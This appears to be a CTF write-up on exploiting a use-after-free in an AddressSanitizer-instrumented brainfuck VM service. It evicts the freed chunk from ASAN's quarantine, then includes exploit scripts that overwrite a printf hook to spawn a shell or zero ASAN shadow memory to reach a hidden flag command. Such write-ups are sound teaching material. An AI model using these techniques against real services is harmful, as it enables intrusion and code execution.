In this post we are going to describe two alternative solutions to the quarantine challenge from the Confidence 2015 Teaser organized by DragonSector. This was a very interesting challenge, and even though it took dreyer and me a looong time to solve it I really enjoyed working on it.
One detail worth flagging early: the main command handler in the binary contains a hidden give_me_the_flag command. The function handling this command opens the flag.txt file, reads it into a global buffer and outputs it using printf.
Let's start with the challenge description:
The developers of this service think they have found a way to automatically thwart all memory corruption attacks. Can you prove them wrong?
The service is running at 134.213.135.43:10000.
Files: vm.so quarantine
Disclaimer: the exploit code below is far from elegant and can probably be greatly improved, but hey it's for a CTF and in those conditions whatever works is good enough ;-p
Preliminary analysis
The quarantine file is the main binary, which uses the vm.so file to interpret brainfuck programs. When we load the binary into IDA, we see that it has been compiled with AddressSanitizer (or ASAN), which is what the challenge description refers to when it says "a way to automatically thwart all memory corruption attacks."
A quick check with checksec reveals the following:
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : ENABLED
RELRO     : FULL
gdb-peda$
So we not only have to deal with ASAN, but we have a binary with full ASLR, NX and RELRO. This is gonna be fun :)
Let's move on with the analysis. The main binary listens on a given port (passed as a parameter on the command line) and forks for each client. This means that ASLR is not such a big deal: every forked child inherits the parent's memory layout, so the addresses remain constant across connections and we can reuse leaks from ASAN's error reporting for our exploit.
When we connect to the service, it provides the following options:
[ASCII-art banner: "Brainfuck Machine"]

Choose your option:
add: Adds a new virtual machine.
remove: Removes a virtual machine.
change: Changes the virtual machine program.
select: Selects a virtual machine to use.
run: Starts the execution of a virtual machine.
exit: Terminates the connection.
Option:
Since the developers of this system think they do not need to care about memory corruption due to the use of ASAN, the code is full of bugs.
Unfortunately, when we enter the hidden give_me_the_flag command, we overflow a stack buffer and ASAN detects it. So it seems we'll need to do some more work than this ;)
Reverse engineering the main binary
When analyzing the code in the main binary, we find that the program keeps a linked list of VMs. The linked list starts at the first_vm global symbol, and VMs are always added at the front of the list.
When a vm is selected, the current_vm symbol is set to point to it. When run is executed, the selected VM is executed as you can see in this code:
__int64 __cdecl run()
{
  __int64 v0; // rdx@0
  __int64 v1; // rcx@0
  const char *v2; // rsi@0
  __int64 v3; // r8@0
  unsigned __int64 v4; // r9@0
  __int64 result; // rax@2
  char v6; // [sp+0h] [bp-10h]@0

  if ( globals::current_vm[0] )
    LODWORD(result) = vm::run(globals::current_vm[0]);
  else
    LODWORD(result) = printf(
                        "No machine selected for execution. Please use the \"select\" command first.\n");
  return result;
}
When a VM is removed, the code goes through the list of VMs until it finds the right VM and frees it. However, if the VM is not the first_vm the code forgets to check whether current_vm points to it or not.
Therefore, if we select a VM (other than first_vm, i.e. the last added VM) and then remove it, we get a dangling pointer as the current_vm. If we manage to reallocate this memory, we would have a VM structure totally under control.
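The bug described above can be modelled in a few lines of Python. This is only a sketch of the list logic, not the decompiled code: the VM and Manager classes and the freed flag are hypothetical names, and the assumption that the head case clears current_vm correctly is inferred from the description rather than shown in the binary.

```python
class VM:
    """Toy stand-in for a VM list node (fields are illustrative)."""
    def __init__(self, name, next_vm=None):
        self.name = name
        self.next = next_vm
        self.freed = False


class Manager:
    """Hypothetical model of the add/select/remove logic."""
    def __init__(self):
        self.first_vm = None
        self.current_vm = None

    def add(self, name):
        # New VMs are always pushed at the front of the list.
        self.first_vm = VM(name, self.first_vm)

    def select(self, name):
        node = self.first_vm
        while node is not None and node.name != name:
            node = node.next
        self.current_vm = node

    def remove(self, name):
        prev, node = None, self.first_vm
        while node is not None and node.name != name:
            prev, node = node, node.next
        if node is None:
            return
        if prev is None:
            # Head case (assumed correct): the selection is cleared.
            self.first_vm = node.next
            if self.current_vm is node:
                self.current_vm = None
        else:
            # Non-head case: unlinked and freed, current_vm untouched (the bug).
            prev.next = node.next
        node.freed = True  # stands in for free()


mgr = Manager()
for n in ("vm0", "vm1", "vm2"):
    mgr.add(n)
mgr.select("vm1")   # vm1 is not the head (vm2 is)
mgr.remove("vm1")
print(mgr.current_vm.name, mgr.current_vm.freed)  # vm1 True
```

After the remove, current_vm still references the freed node, which is the dangling pointer the rest of the exploit relies on.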
Reverse engineering the VM structure
Before we move on, we also need to understand the data structure used to keep track of the VMs and how they are used. We can do that by looking at the code initializing VMs in the main binary or by looking at the vm.so code. I found it easier to look at the vm.so code since it is not so cluttered with ASAN's stuff.
The data structure used to represent a VM looks like this (as defined in my IDA database):
00000000 bfvm            struc ; (sizeof=0x38)
00000000 array           dq ?                    ; XREF: vm::run(vm::VMState *)+1D0 r
00000000                                         ; vm::run(vm::VMState *)+1FD r ...
00000008 arraysz         dd ?
0000000C field_C         dd ?
00000010 program         dq ?
00000018 progamsz        dd ?
0000001C idx             dd ?                    ; XREF: vm::run(vm::VMState *)+1C7 r
0000001C                                         ; vm::run(vm::VMState *)+1F4 r ...
00000020 field_20        dd ?
00000024 field_24        dd ?
00000028 name            db 16 dup(?)
00000038 bfvm            ends
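To make the layout concrete, here is a minimal Python sketch that packs a structure with the same field offsets using the standard struct module. The helper name fake_vm and the placeholder addresses are made up for illustration, and the unnamed fields are simply zeroed since their meaning is unknown.

```python
import struct

# Mirrors the bfvm layout above (little-endian, no padding, 0x38 bytes):
# array(8) arraysz(4) field_C(4) program(8) progamsz(4) idx(4)
# field_20(4) field_24(4) name(16)
BFVM = struct.Struct("<QIIQIIII16s")


def fake_vm(array, arraysz, program, progsz, name=b""):
    """Return the raw bytes of a bfvm; unknown fields are zeroed."""
    return BFVM.pack(array, arraysz, 0, program, progsz, 0, 0, 0, name)


# Placeholder addresses, purely for illustration.
blob = fake_vm(0x4141414141414141, 8, 0x4242424242424242, 30, b"fake")
print(len(blob) == 0x38)                            # True
print(BFVM.unpack(blob)[0] == 0x4141414141414141)   # True
```

Whoever controls these 0x38 bytes controls which memory the interpreter treats as its array and which bytes it executes as a program.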
When the vm::run method is called, first vm::reset_state is called on the VM. This is what this method does:
__int64 __fastcall vm::reset_state(struct bfvm *a1)
{
  __int64 result; // rax@2
  unsigned int i; // [sp+0h] [bp-Ch]@1

  a1->idx = 0;
  for ( i = 0; ; ++i )
  {
    result = i;
    if ( i >= a1->arraysz )
      break;
    *(_BYTE *)(a1->array + i) = 0;
  }
  return result;
}
Thus, it resets the data index and zeroes out arraysz bytes starting at the array pointer. Next, vm::run enters an instruction-processing loop. The data pointer is bounds-checked against the array; if the check fails, an error is printed, the VM is reset and the program exits. If the data pointer is within bounds, the code parses the command at the current program counter and executes it.
Note that if a loop is found ([ or ]), the code also performs a search for the matching bracket and prints an error if it cannot find it. These error prints are performed using printf, which will become important in our solution later on ;-).
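The interpreter behaviour described above can be approximated with a toy model in Python. This is a sketch based only on the description, not a port of vm.so: the function names, the error strings and the handling of end-of-input are assumptions. The real VM zeroes the array again when it exits; the toy returns the final array so it can be inspected.

```python
def find_match(program, pc):
    """Return the index of the bracket matching program[pc], or None."""
    step = 1 if program[pc] == "[" else -1
    depth, i = 0, pc
    while 0 <= i < len(program):
        if program[i] == "[":
            depth += 1
        elif program[i] == "]":
            depth -= 1
        if depth == 0:
            return i
        i += step
    return None


def run_vm(program, array_size, stdin=b""):
    """Toy interpreter loosely following the behaviour described above."""
    out = []
    array = bytearray(array_size)       # reset_state: idx = 0, array zeroed
    idx, pc, inp = 0, 0, list(stdin)
    while pc < len(program):
        if not 0 <= idx < array_size:   # bounds check on the data pointer
            out.append("error: data pointer out of bounds")
            break
        op = program[pc]
        if op == ">":
            idx += 1
        elif op == "<":
            idx -= 1
        elif op == "+":
            array[idx] = (array[idx] + 1) & 0xFF
        elif op == "-":
            array[idx] = (array[idx] - 1) & 0xFF
        elif op == ",":
            array[idx] = inp.pop(0) if inp else 0   # EOF handling is assumed
        elif op == ".":
            out.append(chr(array[idx]))
        elif op in "[]":
            match = find_match(program, pc)
            if match is None:           # the real VM reports this via printf
                out.append("error: unmatched bracket")
                break
            if (op == "[" and array[idx] == 0) or (op == "]" and array[idx] != 0):
                pc = match
        pc += 1
    return bytes(array), out


print(run_vm("+++>++", 4))    # (b'\x03\x02\x00\x00', [])
print(run_vm("+[[[", 4)[1])   # ['error: unmatched bracket']
```

The second call shows the property that matters later: an unbalanced bracket reaches the error path while the program is still running, before any final reset of the array.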
ASAN and Use-After-Free conditions
So now we have an idea of what our dangling pointer will be used for: to zero out a piece of data, run a brainfuck program using this data as the brainfuck VM memory, and finally zero it out again before returning.
Now we need to figure out how to exploit a Use-After-Free in the presence of ASAN. During the CTF, we had no idea how ASAN worked internally, so we started searching on Google. One of the key resources was this post from Scarybeast.
In this post, a C program is provided that will trigger a use-after-free without ASAN noticing it. The code is based on allocating and freeing a lot of memory in order to achieve a reallocation of the freed chunk.
We used this code as a basis, and made some experiments on our test machine. Here is the relevant code fragment:
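# Allocate 40 small VMs
for i in xrange(40):
    add("vm%d" % i, 56, "A"*50, 56)
# Select a VM that is not the list head, then free it: current_vm now dangles
select(20)
remove(20)
# Push large chunks through the quarantine (loop is tuned per machine)
for i in xrange(i+1, i+loop):
    print i
    add("vm%d" % i, 128, "A"*100, 0x400000)
    remove(40)
# Allocate small VMs again, hoping one of them reuses the freed chunk
for i in xrange(i+1, i+loop):
    print i
    add("vm%d" % i, 56, "A"*56, 0x400000)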
After some experiments, we figured out that our local machine with the default configuration required a value of 300 for the loop variable in order to trigger the re-allocation of the removed VM. For the remote machine, a value of 60 worked well during the CTF. When run with ASAN_OPTIONS=quarantine_size=16777216 on my local machine, the binary behaves similarly to the remote server, so you can use this setting if you want to test the exploits below.

ASAN's UaF detection is based on a quarantine zone where freed chunks are kept for a while. Chunks only leave the quarantine after a certain amount of memory has been placed into it (similar to Microsoft's delayed free in Internet Explorer). The hope is that with this approach, use-after-free conditions will be easily caught during fuzzing/testing, since it is unlikely that so much memory is freed and reallocated before the dangling pointer is reused.
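The quarantine idea can be illustrated with a toy FIFO model in Python. This is a deliberate simplification and not ASAN's actual allocator: the Quarantine class, its fields and the chunk tags are hypothetical, and the real implementation is more involved, so the count printed here should not be expected to match the 60 and 300 iterations mentioned above.

```python
from collections import deque


class Quarantine:
    """Toy FIFO quarantine with a byte budget (a simplification)."""
    def __init__(self, max_bytes):
        self.max_bytes = max_bytes
        self.queue = deque()
        self.used = 0
        self.reusable = []   # chunks handed back to the allocator

    def free(self, tag, size):
        self.queue.append((tag, size))
        self.used += size
        # Evict the oldest chunks once the budget is exceeded.
        while self.used > self.max_bytes:
            old_tag, old_size = self.queue.popleft()
            self.used -= old_size
            self.reusable.append(old_tag)


q = Quarantine(max_bytes=16 * 1024 * 1024)   # quarantine_size=16777216
q.free("victim_vm", 56)                      # the freed, still-selected VM
frees = 0
while "victim_vm" not in q.reusable:
    q.free("big%d" % frees, 0x400000)        # large arrays, as in the loop above
    frees += 1
print(frees)  # 4
```

The point of the model is only the ordering: the victim chunk becomes available for reallocation once enough newer frees have pushed it out of the queue.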
Anyway, with the above code (in particular with the freeing of big amounts of data) we managed to evict the target chunk from the quarantine and get it allocated again. So now it's time to move on and exploit this bug!
Solution 1: getting a shell
So let's first discuss our own solution, and then discuss the intended challenge solution. Our own solution was to use the UaF to overwrite some arbitrary memory and get a shell.
The binary uses RELRO, so we cannot target the GOT. However, ASAN places some hooks in functions such as printf, scanf, etc. as you can see here:
int __fastcall printf(__sanitizer::StackTrace *this, const char *a2, __int64 a3, __int64 a4, __int64 a5, unsigned __int64 a6, char a7)
{
  int (__fastcall *v7)(_QWORD, _QWORD); // rcx@6
  int (__fastcall *v8)(_QWORD, _QWORD); // rax@7
  char v10; // [sp+0h] [bp-108h]@1
  const char *v11; // [sp+8h] [bp-100h]@1
  __int64 v12; // [sp+10h] [bp-F8h]@1
  __int64 v13; // [sp+18h] [bp-F0h]@1
  __int64 v14; // [sp+20h] [bp-E8h]@1
  unsigned __int64 v15; // [sp+28h] [bp-E0h]@1
  __int128 v16; // [sp+B0h] [bp-58h]@1
  char *v17; // [sp+C0h] [bp-48h]@1
  __int128 v18; // [sp+D0h] [bp-38h]@4
  char *v19; // [sp+E0h] [bp-28h]@4

  v15 = a6;
  v14 = a5;
  v13 = a4;
  v12 = a3;
  v11 = a2;
  v17 = &v10;
  *((_QWORD *)&v16 + 1) = &a7;
  *(_QWORD *)&v16 = 206158430216LL;
  if ( !__asan::asan_init_is_running )
  {
    if ( __asan::asan_inited
      || (__asan::AsanInitFromRtl(this, (signed __int64)&__asan::asan_init_is_running, a2, a6),
          !__asan::asan_init_is_running) )
    {
      if ( !__asan::asan_inited )
        __asan::AsanInitFromRtl(this, (signed __int64)&v18, a2, a6);
      v19 = v17;
      v18 = v16;
      if ( __sanitizer::common_flags_dont_use[56] )
      {
        a2 = (const char *)&v18;
        sub_46F70(this, (unsigned __int64)&v18, (const char *)&v18);
      }
    }
  }
  v7 = *(int (__fastcall **)(_QWORD, _QWORD))__interception::real_vprintf;
  if ( __sanitizer::indirect_call_wrapper )
  {
    LODWORD(v8) = __sanitizer::indirect_call_wrapper(*(_QWORD *)__interception::real_vprintf, a2);
    v7 = v8;
  }
  return v7(this, &v16);
}
So we targeted this call. Our strategy is to create a fake VM structure that contains the following data:
- Array pointer: quarantine+0x4FE328, which is the address of the real_vprintf symbol above.
- Array size: 8 bytes (the size of a pointer in x64)
- Program: pointer to the heap, where we'll have prepared a brainfuck program
Then, the brainfuck program will perform a series of ", >" commands. This will read from standard input using getchar, write it over the target symbol and increment the data pointer. With this we can control the value of the real_vprintf hook.
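The effect of the ", >" sequence can be sketched in Python by simulating just those two commands over a byte buffer. The helper names, the initial slot value and the target address are all made up for illustration; the sketch stops after the last read instead of emitting a trailing ">", a design choice that keeps the data pointer inside an 8-byte array.

```python
import struct


def bf_overwrite_program(n):
    """Program that reads n bytes from stdin into n consecutive cells."""
    return ",>" * (n - 1) + ","


def simulate(program, stdin, memory, base):
    """Apply only the ',' and '>' commands to a bytearray, starting at base."""
    idx, inp = base, iter(stdin)
    for op in program:
        if op == ",":
            memory[idx] = next(inp)
        elif op == ">":
            idx += 1
    return memory


# Hypothetical 8-byte slot holding a function pointer, plus a made-up target.
memory = bytearray(struct.pack("<Q", 0x00007F0011223344))
target = 0x00007F00DEADBEEF
simulate(bf_overwrite_program(8), struct.pack("<Q", target), memory, 0)
print(hex(struct.unpack("<Q", memory)[0]))  # 0x7f00deadbeef
```

Because x64 is little-endian, sending the packed pointer byte by byte in this order rebuilds the full 64-bit value in place.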
The next step is actually triggering the call without exiting the VM. If we exit the VM, the data will be zeroed, so the next printf call would go through a null pointer and crash.
But since our VM interpreter calls printf on error conditions, we just need to trigger one! What we did was adding a bunch of [ at the end of the VM program, such that the loops were out of balance and printf would be called.
The final question is what to overwrite real_vprintf with. Our first attempt was to use the give_flag() address, since the code already reads the flag and prints it out. Unfortunately, it does so via printf and this results in an infinite recursion... so we turned to executing a shell instead.
For this, we use the following gadget:
.text:000000000004652C    mov     rax, cs:environ_ptr_0
.text:0000000000046533    lea     rdi, aBinSh     ; "/bin/sh"
.text:000000000004653A    lea     rsi, [rsp+180h+var_150]
.text:000000000004653F    mov     cs:dword_3C06C0, 0
.text:0000000000046549    mov     cs:dword_3C06D0, 0
.text:0000000000046553    mov     rdx, [rax]
.text:0000000000046556    call    execve
print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
    add("vm%d" % i, 56, "A", 56)
# Select and free one of them
print "[*] Creating UAF condition"
select(20)
remove(20)
# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
    add("vm%d" % i, 128, "A"*100, 0x400000)
    remove(40)
print "[*] Reallocating memory"
for i in xrange(i+1, i+loop):
    add("vm%d" % i, 56, p64(printf)+p32(8)+"XXXX" + p64(heap)+ p32(30) +",,,,,,,>,>,>,>,>,>,>,>,>,[[[[[", 0x400000)
print "[*] Triggering shell! "
# # Exit for my own libc
runsend("A"+p64(target)+"A"*20)
x.send("echo w00t;\n")
x.readuntil("w00t\n")
print "[*] Everything ok! Dropping into shell."
x.send("id\n")
x.interactive()
Which gives the following output when we run it on my test machine:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python client.py
[+] Opening connection to localhost on port 1234: Done
[*] Performing initial allocations
[*] Creating UAF condition
[*] Freeing enough memory...
[*] Reallocating memory
[*] Triggering shell!
[*] Everything ok! Dropping into shell.
[*] Switching to interactive mode
uid=1000(sfx) gid=1000(sfx) groups=1000(sfx),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),124(sambashare)
$ uname -a
Linux ubuntu 3.16.0-31-generic #43-Ubuntu SMP Tue Mar 10 17:37:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
$ cat flag.txt
THISISTHEFLAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
$
Which during the CTF resulted in the following flag:
[*] Switching to interactive mode
$ cat flag.txt
DrgnS{5h0uldve_us3d_Sophos_Qu4rantine!}
$
Solution 2: zero-out shadow memory
It turns out the intended solution was actually slightly easier than our solution. ASAN works by keeping a shadow memory region in which it keeps track of the state of different memory areas. When it finds a problem, it reports where the fault originated and what the associated shadow region is.
For example, if we try to run the give_me_the_flag command we get this:
Option: give_me_the_flag
=================================================================
==115178==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffcb44e248 at pc 0x7f2cc53068f6 bp 0x7fffcb44e0c0 sp 0x7fffcb44d858
WRITE of size 17 at 0x7fffcb44e248 thread T0
    #0 0x7f2cc53068f5 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x458f5)
    #1 0x7f2cc53076b0 (/mnt/hgfs/conf2015q/quarantine/quarantine+0x466b0)
    #2 0x7f2cc5380493 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf493)
    #3 0x7f2cc537dd34 (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbcd34)
    #4 0x7f2cc3ca0ec4 (libc.so.6+0x21ec4)
    #5 0x7f2cc537c0bc (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbb0bc)

Address 0x7fffcb44e248 is located in stack of thread T0 at offset 40 in frame
    #0 0x7f2cc53803bf (/mnt/hgfs/conf2015q/quarantine/quarantine+0xbf3bf)

  This frame has 1 object(s):
    [32, 40) 'op' <== Memory access at offset 40 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x100079681bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100079681c40: 00 00 00 00 f1 f1 f1 f1 00[f3]f3 f3 00 00 00 00
  0x100079681c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x100079681c70: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 04 f2
  0x100079681c80: 00 f2 f2 f2 04 f2 00 00 f2 f2 04 f2 04 f2 04 f3
  0x100079681c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:     fa
  Heap right redzone:    fb
  Freed heap region:     fd
  Stack left redzone:    f1
  Stack mid redzone:     f2
  Stack right redzone:   f3
  Stack partial redzone: f4
  Stack after return:    f5
  Stack use after scope: f8
  Global redzone:        f9
  Global init order:     f6
  Poisoned by user:      f7
  Container overflow:    fc
  ASan internal:         fe
This tells us that if we zero out the bytes starting at 0x100079681c49 (shadow1 in my exploit) we should not trigger this detection and we should be able to call this command. As we know, we can do that by pointing the array space of the fake VM structure to this address and then running the VM.
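The shadow address in the report can be reproduced from the faulting address. The sketch below uses ASAN's default mapping for x86_64 Linux (shift by 3, offset 0x7fff8000); the function and constant names are my own, and other platforms or build options may use a different offset.

```python
SHADOW_SCALE = 3             # one shadow byte per 8 application bytes
SHADOW_OFFSET = 0x7FFF8000   # default offset on x86_64 Linux


def mem_to_shadow(addr):
    """Map an application address to the address of its shadow byte."""
    return (addr >> SHADOW_SCALE) + SHADOW_OFFSET


# Faulting stack address taken from the report above.
print(hex(mem_to_shadow(0x7fffcb44e248)))  # 0x100079681c49
```

Since each shadow byte covers 8 application bytes, zeroing n shadow bytes from that address marks 8*n bytes of the stack as addressable.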
However, if we do this we get another error:
0x7f2cc61dcff0 is located 0 bytes to the right of global variable 'globals::flag_buffer' defined in 'challenge.cc:27:6' (0x7f2cc61dcfe0) of size 16
SUMMARY: AddressSanitizer: global-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x0fe618c339a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c339e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
=>0x0fe618c339f0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 00[f9]f9
  0x0fe618c33a00: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe618c33a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Which means we actually need to trigger a zero-out again on a second shadow memory region (shadow2), because the flag was too large to fit in the global buffer that was used to read it! Fortunately we can change our VM program by using the change command. We can change the most recent N VMs that we added and then try to run again. After this, we are able to issue the give_me_the_flag command and get the flag :)
print "[*] Performing initial allocations"
# First allocate a few VMs
for i in xrange(40):
    add("vm%d" % i, 56, "A", 56)
# Select and free one of them
print "[*] Creating UAF condition"
select(20)
remove(20)
# Put lots of memory into the quarantine
print "[*] Freeing enough memory..."
for i in xrange(i+1, i+loop):
    add("vm%d" % i, 128, "A"*100, 0x400000)
    remove(40)
print "[*] Reallocating memory"
# And reallocate it
for i in xrange(i+1, i+loop2):
    add("vm%d" % i, 56, p64(shadow1)+p32(16)+("%.4x" % i) + p64(heap)+ p32(30) +"+", 0x400000)
print "[*] Zeroing shadow memory for stack buffer"
# Zero out shadow1
run()
print "[*] Replacing program "
# Now replace the fake VM struct to zero out shadow2
for i in xrange(20):
    change(i, p64(shadow2)+p32(20)+"XXXX" + p64(heap)+ p32(1) +"+")
print "[*] Zeroing shadow memory for global buffer"
# And actually do it
run()
# And now just send give_me_the_flag
x.write("\n")
x.write("give_me_the_flag\n")
x.readuntil("Your flag is:")
print "[*] YOUR FLAG: " , x.readuntil("\n")
And when we run it:
sfx@ubuntu:/mnt/hgfs/conf2015q/quarantine$ python exp2.py
[+] Opening connection to localhost on port 1234: Done
[*] Performing initial allocations
[*] Creating UAF condition
[*] Freeing enough memory...
[*] Reallocating memory
[*] Zeroing shadow memory for stack buffer
[*] Replacing program
[*] Zeroing shadow memory for global buffer
[*] YOUR FLAG: THISISTHEFLAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[*] Closed connection to localhost port 1234